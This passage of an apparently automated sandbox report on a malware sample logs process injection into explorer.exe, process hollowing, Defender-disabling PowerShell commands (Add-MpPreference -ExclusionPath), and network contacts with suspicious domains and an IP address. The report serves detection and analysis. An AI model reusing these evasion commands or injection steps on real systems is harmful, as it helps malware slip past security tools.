Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Code function: 11_2_00420A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00420A60
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Code function: 11_2_0041D2F0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0041D2F0
Source: C:\Users\user\AppData\Roaming\iwbavbe	Code function: 21_2_00426440 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_00426440
Source: C:\Users\user\AppData\Roaming\iwbavbe	Code function: 21_2_0041D1B0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_0041D1B0

HIPS / PFW / Operating System Protection Evasion:

Early bird code injection technique detected

Show sources

Source: C:\Users\user\AppData\Local\Temp\31F4.exe

Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\31F4.exe

Jump to behavior

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe	Domain query: znpst.top
Source: C:\Windows\explorer.exe	Network Connect: 216.128.137.31 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe	Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe	Domain query: hajezey1.top
Source: C:\Windows\explorer.exe	Domain query: sysaheu90.top

Benign windows process drops PE files

Show sources

Source: C:\Windows\explorer.exe

File created: iwbavbe.6.dr

Jump to dropped file

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\69B.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\69B.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Memory written: C:\Users\user\AppData\Local\Temp\31F4.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Memory written: C:\Users\user\AppData\Local\Temp\31F4.exe base: 400000 value starts with: 4D5A

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Thread created: C:\Windows\explorer.exe EIP: 44E1920	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Thread created: unknown EIP: 4E51920	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\20BD.exe	Thread created: unknown EIP: 4F819C0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\46D6.exe	Thread created: unknown EIP: 6871920

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force	Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\AppData\Local\Temp\69B.exe

Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base address: 400000

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\69B.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 41C000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 41E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: C8F008	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\31F4.exe

Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\31F4.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run	Jump to behavior

Source: C:\Users\user\Desktop\F7E3DjYJpC.exe	Process created: C:\Users\user\Desktop\F7E3DjYJpC.exe 'C:\Users\user\Desktop\F7E3DjYJpC.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iwbavbe	Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A4B.exe	Process created: C:\Users\user\AppData\Local\Temp\9A4B.exe C:\Users\user\AppData\Local\Temp\9A4B.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\69B.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iwbavbe	Process created: C:\Users\user\AppData\Roaming\iwbavbe C:\Users\user\AppData\Roaming\iwbavbe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3C84.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe' /SpecialRun 4101d8 2812
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Process created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Process created: C:\Users\user\AppData\Local\Temp\31F4.exe 31F4.exe
Source: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\7c8ebbc4-8deb-40dd-b0f8-2d1ec9a44654\AdvancedRun.exe' /SpecialRun 4101d8 5256

Source: C:\Users\user\AppData\Local\Temp\8a05076d-68b0-45fb-9c83-e8cf76f7fdb4\AdvancedRun.exe

Code function: 25_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,

25_2_00401C26

Source: C:\Users\user\AppData\Local\Temp\20BD.exe

Code function: 20_2_6AB9E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,

20_2_6AB9E730

Source: explorer.exe, 00000006.00000000.725317869.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000006.00000000.713159339.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.700663626.0000000005E50000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.713159339.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.713159339.0000000001080000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.733043896.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\AppData\Local\Temp\69B.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\69B.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\69B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1254.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1254.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\31F4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\31F4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\3C84.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3C84.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\9415.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
